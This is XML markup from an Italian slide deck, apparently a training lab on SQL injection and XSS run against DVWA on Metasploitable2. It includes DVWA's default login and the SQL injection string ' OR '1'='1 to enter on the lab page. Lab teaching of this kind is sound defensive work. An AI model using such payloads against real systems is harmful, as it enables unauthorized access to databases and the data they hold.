        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>andare sulla pagina SQL Injection ed inserite il codice ' OR '1'='1 e cliccare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>Submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11645507" y="3274774"/>
            <a:ext cx="2412060" cy="339725"/>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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9599122" y="3774490"/>
            <a:ext cx="1087502"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03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="6311999" y="1611412"/>
            <a:ext cx="2675186" cy="1136424"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1903439" cy="808585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1903439" cy="808585"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="808585" w="1903439">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1903439" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1903439" y="808585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="808585"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="1903439" cy="837160"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="2179624"/>
            <a:ext cx="7937971" cy="5927751"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10583961" cy="7903668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 11" id="11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="12662" r="0" b="12662"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="10583961" cy="7903668"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="6548209"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10670331" y="3216096"/>
            <a:ext cx="1618141" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1151334" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>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17" id="17"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>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9" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9595504"/>
            <a:ext cx="402082" cy="198045"/>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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10670331" y="2065324"/>
            <a:ext cx="6852866" cy="873125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>INTRODUZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10670331" y="3563699"/>
            <a:ext cx="6588969" cy="3293497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2439"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1742">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>La sicurezza informatica è un aspetto fondamentale per qualsiasi organizzazione o individuo che utilizza la tecnologia. Le minacce alla sicurezza possono avere gravi conseguenze, tra cui la perdita di dati sensibili, danni alla reputazione e significative perdite finanziarie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2439"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1742">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Due delle tecniche di attacco più comuni utilizzate dagli hacker per compromettere la sicurezza dei sistemi sono il Cross-Site Scripting (XSS) e l'SQL Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2439"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1742">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Questi attacchi mirano a sfruttare le vulnerabilità nelle applicazioni web, consentendo agli attaccanti di ottenere accesso non autorizzato o manipolare dati sensibili.</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 2" id="2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8308384" y="1835644"/>
            <a:ext cx="8240918" cy="6615711"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2024778" cy="1625468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 3" id="3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2024778" cy="1625468"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1625468" w="2024778">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="1625468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1625468"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="2024778" cy="1654043"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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9" id="9"/>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0" id="10"/>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17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="0"/>
            <a:ext cx="8777564" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11703418" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 12" id="12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="23109" t="0" r="19934" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11703418" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8840313" y="1974183"/>
            <a:ext cx="7652417" cy="4219964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7280">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>attacchi SQl injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7280">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>blind</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9640317" y="6254426"/>
            <a:ext cx="6052409" cy="816610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Esempi di attacco SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>in ambiente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> Metasploitable2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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7" id="7"/>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8" id="8"/>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18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 11" id="11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="4199" r="0" b="4199"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>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4" id="14"/>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5" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>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7" id="17"/>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8" id="18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 19" id="19"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="0" t="9560" r="0" b="9560"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1476431" y="1409727"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>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22" id="22"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 23" id="23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16029537" y="6967452"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 24" id="24"/>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25" id="25"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="5977608"/>
            <a:ext cx="2788414" cy="692150"/>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Configurazione livello di difficoltà</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2464800" y="5685355"/>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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11592171" y="3041264"/>
            <a:ext cx="4250078" cy="1369060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Inserite l’indirizzo IP della vostra macchina Metasploitable2 ed eseguite l’accesso alla DVWA con le credenziali di default :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>admin per lo Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>password per la Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11592171" y="2501153"/>
            <a:ext cx="2788414" cy="339725"/>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Accesso alla DVWA </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9878149" y="2208901"/>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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="6720878"/>
            <a:ext cx="4250078" cy="540385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
